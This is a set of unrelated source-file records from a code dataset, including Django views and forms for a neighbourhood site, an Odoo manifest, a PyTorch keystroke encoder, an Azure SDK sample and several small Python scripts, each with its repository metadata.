2cdc66492dfb46bbb78b8d42ff8a5b489db7a9a3
|
68b4ec2179782916fba0aa204255a75bba459b53
|
refs/heads/rory
| 2021-01-21T12:11:48.035094
| 2017-11-30T23:22:34
| 2017-11-30T23:22:34
| 102,047,698
| 0
| 2
| null | 2017-11-30T23:23:23
| 2017-08-31T21:39:02
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 745
|
py
|
import csv
import json
import os
classifiers = []
recipeClasses = ["Asian", "Mexican", "Italian"]
for recipeClass in recipeClasses:
directory = os.path.join(os.getcwd(), recipeClass)
for filename in os.listdir(directory):
with open(os.path.join(directory, filename)) as fileinfo:
data = json.loads(fileinfo.read())
allIngredients = ""
for datum in data['Ingredients']:
allIngredients = allIngredients + " " + datum
classifiers.append({'query':allIngredients, 'classifier':recipeClass})
writer = csv.writer(open('train.csv', 'w'))
for row in classifiers:
writer.writerow([unicode(row['query']).encode("utf-8"), unicode(row['classifier']).encode("utf-8")])
|
[
"mubasil@yahoo.com"
] |
mubasil@yahoo.com
|
df7f090efeff95de6885e079eb45d56b1f1a4a2d
|
1a8d1f8c16fb2842a0b0f71b7860f0bff8e6d257
|
/car_report/__manifest__.py
|
02c686e7de5aa9cc9cb002abd93c5923d5e67add
|
[] |
no_license
|
vidtsin/odoo-leasing
|
85a288e4d47697591397b892cb65d911987aa991
|
5fd7a2fe23ae47d992bc03a9e474c08363c78b9e
|
refs/heads/master
| 2020-08-03T04:37:39.587593
| 2019-07-28T14:25:14
| 2019-07-28T14:25:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
# -*- coding: utf-8 -*-
{
'name': 'Car Report',
'version': '0.1',
'summary': 'Show car reports',
'sequence': 30,
'description': """
car
====================
The specific and easy-to-use car system in Odoo allows you to keep track of your vehicle.
""",
'category': 'car',
'website': '',
'author': "Cedric FOWOUE",
'images': [
'static/src/img/icon.png',
],
'depends': ['car_contract', 'car_payment'],
'data': [
'security/ir.model.access.csv',
'views/car_report.xml',
],
'qweb': [
"static/src/xml/car_report.xml",
"static/src/xml/car_report_follow.xml",
],
'installable': True,
'application': False,
'auto_install': False,
}
|
[
"cedvict@gmail.com"
] |
cedvict@gmail.com
|
4b18b019b2ff1da71c7219f94ea175182cf795a4
|
bd14632342076a8099dbbd51c1b0c71bc8352b6a
|
/main.py
|
85a29f77583d8b29671e15d3c458dd515102c514
|
[
"MIT"
] |
permissive
|
nlehuen/led_display
|
511fbb3f2d0260d4ae60f3a2e6a99d366d927281
|
6f77ac919f9f3d3972646a6f26907fefb79a3be2
|
refs/heads/master
| 2021-01-22T02:48:00.386193
| 2013-09-19T08:02:41
| 2013-09-19T08:02:41
| 5,821,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
# -*- coding: utf-8 -*-
import time
import traceback
import json
from configuration import Configuration
import animator
import animations
import importlib
# Try to load Twitter animations
try:
import animations.tweet
except ImportError:
print "Please install twitter module from http://pypi.python.org/pypi/twitter/"
animations.tweet = None
if __name__ == '__main__':
# Load configuration
configuration = Configuration.load('configuration.json')
# Try to connect to LED display through serial port
display = None
try:
import leddisplay
display = leddisplay.Display(
port = configuration.leddisplay.port.required().encode(),
speed = configuration.leddisplay.speed.required(),
threaded = True
)
except leddisplay.serial.SerialException, e:
print "Could not connect to serial port, launching display emulator"
print "\t%s"%e
except:
traceback.print_exc()
    # If connection to LED display was not successful,
# launch the emulator
if display is None:
import tkdisplay
display = tkdisplay.Display(
(
configuration.tkdisplay.width.value(32),
configuration.tkdisplay.height.value(16)
),
configuration.tkdisplay.scale.value(4)
)
# Create the animator
animator = animator.Animator(
display,
configuration.animator
)
# For the moment, run the animator in the main thread
try:
animator.mainloop()
finally:
display.close()
|
[
"nlehuen@google.com"
] |
nlehuen@google.com
|
76401ac4e722d051809095cd5b95aa29888ec01d
|
8485ac621de45db5db3a1faf248690650d951258
|
/tracker.py
|
d39f4122960155450e4719a98a2d22a93bca568b
|
[] |
no_license
|
gerardo8al/portfolio_tracker
|
610e538dfc315c870a6838d8ea68bf3766e8b838
|
5c27e71c00f1d729484afd6b8366b069c98246a4
|
refs/heads/master
| 2020-03-12T17:30:26.253308
| 2018-04-24T20:21:00
| 2018-04-24T20:21:00
| 130,737,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
from constants import *
import csv
import urllib.request
import json
def send_get_request(url):
response = urllib.request.urlopen(url)
json_back = response.read()
json_back = json.loads(json_back.decode('utf-8'))
#json_pretty_print(json_back)
return json_back
def json_pretty_print(parsed):
print(json.dumps(parsed, indent=4, sort_keys=True))
def main():
    #The request returns JSON that contains the info for
    #all the tickers in the exchange.
json_back = send_get_request(URL)
with open(CSV, 'rt') as f:
reader=csv.reader(f)
for row in reader:
ticker = row[0]
quantity = row[1]
if __name__ == "__main__":
main()
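# A possible next step inside the reader loop (a sketch only: URL and the response
# schema live in constants.py, which is not shown here, so 'symbol' and 'price_usd'
# are guessed field names):
#   prices = {item['symbol']: float(item['price_usd']) for item in json_back}
#   position_value = prices[ticker] * float(quantity)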
|
[
"gerardo8a@gmail.com"
] |
gerardo8a@gmail.com
|
b0514a0533d844c12afb5368772ef5d43d163ea9
|
490ac0cbeb1436a642d236381b277b07a86aff2a
|
/blog/migrations/0001_initial.py
|
19f8b37b13b8007b355b1319c3edd370ddfaf805
|
[] |
no_license
|
Marshall210/My_site
|
8f445ce073d75a6b3675c7876288ef6627b3859d
|
8130394070c382af510e2912772b0c9e830e619c
|
refs/heads/master
| 2020-07-21T11:08:50.900237
| 2019-09-22T14:12:17
| 2019-09-22T14:12:17
| 206,843,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.2.5 on 2019-09-20 18:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"tymchenko99978@gmail.com"
] |
tymchenko99978@gmail.com
|
3144ecf342e1c38eb5c4bcf21135c183e9157eee
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py
|
496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-12345678abc",
)
response = client.provider_share_subscriptions.adjust(
resource_group_name="SampleResourceGroup",
account_name="Account1",
share_name="Share1",
provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
f2364a1f5e0049d916164fd82672d551cdfff20d
|
436568fbadd6f52fb5388136a67eef75d86bc6a7
|
/Python3_Mundo2_Introdução ao Mundo 2/Python3_Mundo2_Aula15_Interrompendo repetições while/Desafio068.py
|
f36c743d48b38c87c1b3a887d28b18324ddafa96
|
[
"MIT"
] |
permissive
|
AgladeJesus/python
|
3c72cddaf4e3c92464b5cee7975bd56a764b5f5c
|
16e4e5cc43aa987858a4719748708d6d5327d75d
|
refs/heads/master
| 2023-08-31T08:34:17.069874
| 2021-09-08T08:45:05
| 2021-09-08T08:45:05
| 377,415,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from random import randint
print('Hello, dear player! I am the computer, and I challenge you to a game of Even/Odd.')
v = 0
while True:
    jogador = int(input('Type a number from 1 to 10: '))
    cp = randint(0, 10)
    total = jogador + cp
    tipo = ' '
    while tipo not in 'PI':
        tipo = str(input('Even or odd? [P = even / I = odd]: ')).strip().upper()[0]
    print(f'You played {jogador} and the computer played {cp}; the total is {total},', end=' ')
    print('which is EVEN' if total % 2 == 0 else 'which is ODD')
    if tipo == 'P':
        if total % 2 == 0:
            print('You WON!!')
            v += 1
        else:
            print('You LOST!!')
            break
    elif tipo == 'I':
        if total % 2 == 1:
            print('You WON!!')
            v += 1
        else:
            print('You LOST!!')
            break
    if v > 0:
        print(f'You have {v} wins')
    else:
        print(' ')
    print("Let's play again...")
|
[
"agladejesus@gmail.com"
] |
agladejesus@gmail.com
|
21b5c899a32d5a276c1913f41db7bb2bdd4114a1
|
f4b2f6f8c82ba00a79712292cae159edd6e93316
|
/python_voc_parser/__init__.py
|
e8b5a4dd78a5f1211bf1167cf90337dde6e4acf9
|
[
"MIT"
] |
permissive
|
gabrielrezzonico/python_voc_parser
|
31e5d016cce8a77e3cbd302f34f677ba1ca934c1
|
dd645402e40d3e18a33375f0fe92201013343110
|
refs/heads/master
| 2021-01-19T11:17:56.598529
| 2017-04-12T19:10:53
| 2017-04-12T19:10:53
| 87,950,887
| 7
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
"""Utilities"""
from . import helpers
from . import voc_annotations_parser
# Globally-importable utils.
from .voc_annotations_parser import VocAnnotationsParser
|
[
"gabrielrezzonico@gmail.com"
] |
gabrielrezzonico@gmail.com
|
4a1dff1fff68c27fb3452129c56f54a62957e1cf
|
716c453110217e4b478823940b6ce773fe837b3b
|
/BlogProject/school_project/users/forms.py
|
a8b4b32dc1500efcd07e0eadc0894aef874ace31
|
[] |
no_license
|
Mateaus/blog_site
|
e9a46ac581a65c2b563ff18090480f775a5ad9cf
|
305bafbd18c2a260589da77d8e162fb36994357b
|
refs/heads/master
| 2020-05-07T11:59:47.008936
| 2019-04-11T17:42:58
| 2019-04-11T17:42:58
| 180,485,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
# changing form to include email field
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['image']
|
[
"noreply@github.com"
] |
Mateaus.noreply@github.com
|
8b8c7653fa04c56d1f7f07d4dfa5f5737209c3b7
|
c9a34a7036865101d05065fe47e86c8b173d0b93
|
/test.py
|
fbe90e2d911fe9a2612c4329bca87b6036e73644
|
[] |
no_license
|
Pablocg0/Proyecto_ia
|
7f4e810a5b3cffe586609527d4f2c1367c0ee096
|
5f8ffa56f5e4c7b8adbe098b81599fa7fddbb7ae
|
refs/heads/master
| 2020-09-06T18:10:44.894310
| 2019-11-09T05:54:18
| 2019-11-09T05:54:18
| 220,504,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
import pandas as pd
diccionario = pd.read_csv("dick_1.csv")
palabra = diccionario["a"].sample(n=10)
palabra.to_csv("dick.csv",encoding='utf-8',index=False)
|
[
"pablocg064@gmail.com"
] |
pablocg064@gmail.com
|
29b750bb302001c9849c94b7e2eeb31a1216aadf
|
25a4df7d63285564159a2c9d5b48a66e767c09f9
|
/test_triangle.py
|
1ce21821c7abd08bbac558ff344f2410fb0a0767
|
[
"MIT"
] |
permissive
|
philetus/superNormal
|
c82677c81359e92f33810660fa5aa45161004a71
|
b6df64c2ef4838b8a2080fae0be57cfee40ccf7a
|
refs/heads/master
| 2020-03-20T06:07:10.998229
| 2018-06-13T16:27:41
| 2018-06-13T16:42:02
| 137,239,304
| 0
| 0
| null | 2018-06-13T16:05:38
| 2018-06-13T16:05:38
| null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
import glfw
import OpenGL.GL as gl
def main():
# Initialize the library
if not glfw.init():
return
# Create a windowed mode window and its OpenGL context
window = glfw.create_window(640, 480, "Hello World", None, None)
if not window:
glfw.terminate()
return
# Make the window's context current
glfw.make_context_current(window)
# Loop until the user closes the window
while not glfw.window_should_close(window):
# Render here, e.g. using pyOpenGL
width, height = glfw.get_framebuffer_size(window)
ratio = width / float(height)
gl.glViewport(0, 0, width, height)
gl.glClear(gl.GL_COLOR_BUFFER_BIT)
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glLoadIdentity()
gl.glOrtho(-ratio, ratio, -1, 1, 1, -1)
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glLoadIdentity()
# gl.glRotatef(glfw.glfwGetTime() * 50, 0, 0, 1)
gl.glBegin(gl.GL_TRIANGLES)
gl.glColor3f(1, 0, 0)
gl.glVertex3f(-0.6, -0.4, 0)
gl.glColor3f(0, 1, 0)
gl.glVertex3f(0.6, -0.4, 0)
gl.glColor3f(0, 0, 1)
gl.glVertex3f(0, 0.6, 0)
gl.glEnd()
# Swap front and back buffers
glfw.swap_buffers(window)
# Poll for and process events
glfw.poll_events()
glfw.terminate()
if __name__ == "__main__":
main()
|
[
"cheeriocheng@gmail.com"
] |
cheeriocheng@gmail.com
|
f9911ba1ef369f850f1fe229f1de64f2c3a20c93
|
d49fd2040235f30e5701a997b2afcc4b123b82f1
|
/neighbourhood/views.py
|
513fb809d73e570ef76ba59f7bf262d4e1235690
|
[
"MIT"
] |
permissive
|
ClintonClin/neighbourhood
|
830b9bd0b7e27308b54fedb432877191e6a3585e
|
509ba9702d67e5636aee9d754eaa41e57a52b61a
|
refs/heads/master
| 2022-12-11T08:23:08.690787
| 2019-02-28T10:57:05
| 2019-02-28T10:57:05
| 165,234,843
| 0
| 0
| null | 2022-12-08T03:00:45
| 2019-01-11T11:43:06
|
Python
|
UTF-8
|
Python
| false
| false
| 7,746
|
py
|
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from .models import neighbourhood, healthservices, Business, Health, Authorities, BlogPost, Profile, Notifications, Comment
from .email import send_priority_email
from .forms import notificationsForm, ProfileForm, BlogPostForm, BusinessForm, CommentForm
from decouple import config, Csv
import datetime as dt
from django.http import JsonResponse
import json
from django.db.models import Q
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework.views import APIView
# Create your views here.
def index(request):
try:
if not request.user.is_authenticated:
return redirect('/accounts/login/')
current_user = request.user
profile = Profile.objects.get(username=current_user)
except ObjectDoesNotExist:
return redirect('create-profile')
return render(request, 'index.html')
@login_required(login_url='/accounts/login/')
def notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
all_notifications = Notifications.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'notifications.html', {"notifications": all_notifications})
@login_required(login_url='/accounts/login/')
def health(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
healthservices = Health.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'health.html', {"healthservices": healthservices})
@login_required(login_url='/accounts/login/')
def blog(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
blogposts = BlogPost.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'blog.html', {"blogposts": blogposts})
@login_required(login_url='/accounts/login/')
def businesses(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
businesses = Business.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'business.html', {"businesses": businesses})
@login_required(login_url='/accounts/login/')
def authorities(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
authorities = Authorities.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'security.html', {"authorities": authorities})
@login_required(login_url='/accounts/login/')
def view_blog(request, id):
current_user = request.user
try:
comments = Comment.objects.filter(post_id=id)
except:
comments = []
blog = BlogPost.objects.get(id=id)
if request.method == 'POST':
form = CommentForm(request.POST, request.FILES)
if form.is_valid():
comment = form.save(commit=False)
comment.username = current_user
comment.post = blog
comment.save()
else:
form = CommentForm()
return render(request, 'view_blog.html', {"blog": blog, "form": form, "comments": comments})
@login_required(login_url='/accounts/login/')
def user_profile(request, username):
user = User.objects.get(username=username)
profile = Profile.objects.get(username=user)
return render(request, 'profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def my_profile(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
return render(request, 'user_profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def new_blogpost(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BlogPostForm(request.POST, request.FILES)
if form.is_valid():
blogpost = form.save(commit=False)
blogpost.username = current_user
blogpost.neighbourhood = profile.neighbourhood
blogpost.avatar = profile.avatar
blogpost.save()
return HttpResponseRedirect('/blog')
else:
form = BlogPostForm()
return render(request, 'blogpost_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_business(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BusinessForm(request.POST, request.FILES)
if form.is_valid():
business = form.save(commit=False)
business.owner = current_user
business.neighbourhood = profile.neighbourhood
business.save()
return HttpResponseRedirect('/business')
else:
form = BusinessForm()
return render(request, 'business_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def create_profile(request):
current_user = request.user
if request.method == "POST":
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return HttpResponseRedirect('/')
else:
form = ProfileForm()
return render(request, 'profile_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = notificationsForm(request.POST, request.FILES)
if form.is_valid():
notification = form.save(commit=False)
notification.author = current_user
notification.neighbourhood = profile.neighbourhood
notification.save()
# if notification.priority == 'High Priority':
# send_priority_email(profile.name, profile.email, notification.title, notification.notification, notification.author, notification.neighbourhood)
return HttpResponseRedirect('/notifications')
else:
form = notificationsForm()
return render(request, 'notifications_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def update_profile(request):
current_user = request.user
if request.method == "POST":
instance = Profile.objects.get(username=current_user)
form = ProfileForm(request.POST, request.FILES, instance=instance)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return redirect('Index')
elif Profile.objects.get(username=current_user):
profile = Profile.objects.get(username=current_user)
form = ProfileForm(instance=profile)
else:
form = ProfileForm()
return render(request, 'update_profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def search_results(request):
if 'blog' in request.GET and request.GET["blog"]:
search_term = request.GET.get("blog")
searched_blogposts = BlogPost.search_blogpost(search_term)
message = f"{search_term}"
print(searched_blogposts)
return render(request, 'search.html', {"message": message, "blogs": searched_blogposts})
else:
message = "You haven't searched for anything"
return render(request, 'search.html', {"message": message})
|
[
"clintonclin00@gmail.com"
] |
clintonclin00@gmail.com
|
6b585b2fcc4e1b39e9ed6dbd006f975bf82030b4
|
0fe88e2bcf3015f6b54508b2304e9833bc7f7eb2
|
/skadi/index/__init__.py
|
df5fab35467894641108704a015acd8e8ae77318
|
[
"MIT"
] |
permissive
|
gwvent/skadi
|
3d73ba6efbc32065599d2e0773f4783342cf5482
|
0b5c983a0a17e57d70fb64b2401caba40d43679a
|
refs/heads/master
| 2021-01-17T22:54:38.196692
| 2013-08-20T08:04:25
| 2013-08-20T08:04:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,355
|
py
|
import math
VI_BIT_MAX = 35
VI_SHIFT = 7
VI_MAX_BYTES = int(math.ceil(float(VI_BIT_MAX) / VI_SHIFT))
VI_MASK = (1 << 32) - 1
class InvalidVarint(Exception):
pass
# Algorithm "borrowed" from Google protobuf library.
def peek_varint(stream):
peeked = stream.peek(VI_MAX_BYTES)
size, value, shift = 0, 0, 0
while True:
if size >= len(peeked):
raise EOFError()
byte = ord(peeked[size])
size += 1
value |= ((byte & 0x7f) << shift)
shift += VI_SHIFT
if not (byte & 0x80):
value &= VI_MASK
return value, size
if shift >= VI_BIT_MAX:
raise InvalidVarint
def read_varint(stream):
value, size = peek_varint(stream)
stream.read(size)
return value
class InvalidProtobufMessage(Exception):
pass
class Index(object):
def __init__(self, iterable):
self.peeks = list(iterable)
def __iter__(self):
return iter(self.peeks)
def find(self, cls):
return next(iter(filter(lambda p: p.cls == cls, self.peeks)), None)
def find_all(self, cls):
return filter(lambda p: p.cls == cls, self.peeks)
def find_behind(self, offset):
return filter(lambda p: p.offset < offset, self.peeks)
def find_at(self, offset):
return filter(lambda p: p.offset == offset, self.peeks)
def find_ahead(self, offset):
return filter(lambda p: p.offset > offset, self.peeks)
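# --- Illustrative sketch (editor's addition, not part of the original module).
# peek_varint/read_varint above decode protobuf-style varints: 7 bits per byte,
# least-significant group first, with the high bit of each byte as a
# continuation flag. A self-contained Python 3 round-trip of the same scheme,
# independent of the stream classes above:
if __name__ == "__main__":
    def encode_varint(value):
        out = bytearray()
        while True:
            byte = value & 0x7f
            value >>= VI_SHIFT
            if value:
                out.append(byte | 0x80)  # more bytes follow
            else:
                out.append(byte)
                return bytes(out)

    def decode_varint(data):
        value, shift = 0, 0
        for size, byte in enumerate(bytearray(data), start=1):
            value |= (byte & 0x7f) << shift
            shift += VI_SHIFT
            if not (byte & 0x80):
                return value, size
        raise EOFError()

    assert encode_varint(300) == b"\xac\x02"
    assert decode_varint(b"\xac\x02") == (300, 2)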
|
[
"joshua.a.morris@gmail.com"
] |
joshua.a.morris@gmail.com
|
574e6816db82fec92e4c415548263fb7ef3a52d2
|
ab149b8f1f20bf2212bead49fdf5bd6bf5330b89
|
/model/encoder.py
|
f5b18c46738890812e0f004126797488274a0a76
|
[
"MIT"
] |
permissive
|
wheeltune/kid-neuro
|
69ecf08717d82660cf0e6eccd406c0cad9f24f1e
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
refs/heads/main
| 2023-06-04T06:07:45.074418
| 2021-06-21T23:54:27
| 2021-06-21T23:54:27
| 375,545,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import torch.nn as nn
from .norm_layer import NormLayer
__all__ = ["KeystrokesEncoder"]
#===============================================================================
class KeystrokesEncoder(nn.Module):
#---------------------------------------------------------------------------
def __init__(self, d_codes, d_hidden, n_layers, p_rnn_dropout=0.2, dropout=0.5):
super().__init__()
self.d_codes = d_codes
self.d_times = 4
self.d_model = self.d_codes + self.d_times
self.d_hidden = d_hidden
self.p_dropout = dropout
self.p_rnn_dropout = p_rnn_dropout
self.batch_norm_1 = NormLayer(self.d_model)
self.rnn_1 = nn.LSTM(
self.d_model,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True
)
self.batch_norm_2 = NormLayer(self.d_hidden)
self.dropout = nn.Dropout(self.p_dropout)
self.rnn_2 = nn.LSTM(
self.d_hidden,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True,
)
#---------------------------------------------------------------------------
def forward(self, x):
x = self.batch_norm_1(x)
x, _ = self.rnn_1(x)
x = self.batch_norm_2(x)
x = self.dropout(x)
_, (ht, _) = self.rnn_2(x)
x = ht[-1]
return x
#===============================================================================
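# --- Illustrative sketch (editor's addition, not part of the original module):
# the pattern forward() uses above -- run a batch-first LSTM and keep only the
# last layer's final hidden state -- in self-contained form, without the
# NormLayer dependency:
#
#     import torch
#     from torch import nn
#     rnn = nn.LSTM(20, 32, num_layers=2, batch_first=True)
#     x = torch.randn(8, 50, 20)      # (batch, time, d_codes + d_times)
#     _, (ht, _) = rnn(x)             # ht: (num_layers, batch, hidden)
#     summary = ht[-1]                # (batch, hidden) == (8, 32)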
|
[
"wheeltune@gmail.com"
] |
wheeltune@gmail.com
|
cd6ab3e5c6e2b23fd99f849a3780802dacbeb28a
|
e9c119c3da03b4347456091cc439aaedb07a4bdf
|
/python work week 9 question 2.py
|
576f46d5c72e8ca358a6752ef261406819195dd4
|
[] |
no_license
|
infinityman8/week9-12-logbook
|
da8b1e5942f36b006f3e6bfc0b713623d862f247
|
4de033f3fcb0b69984a1ba0f4a0a654c386c4ec1
|
refs/heads/master
| 2020-04-07T13:52:27.005786
| 2018-12-04T17:44:12
| 2018-12-04T17:44:12
| 158,425,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
def main():
a=5
b=7
print(mystery(a,b))
def mystery(x,y):
z=x + y
z= z / 2.0
return z
main()
|
[
"noreply@github.com"
] |
infinityman8.noreply@github.com
|
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
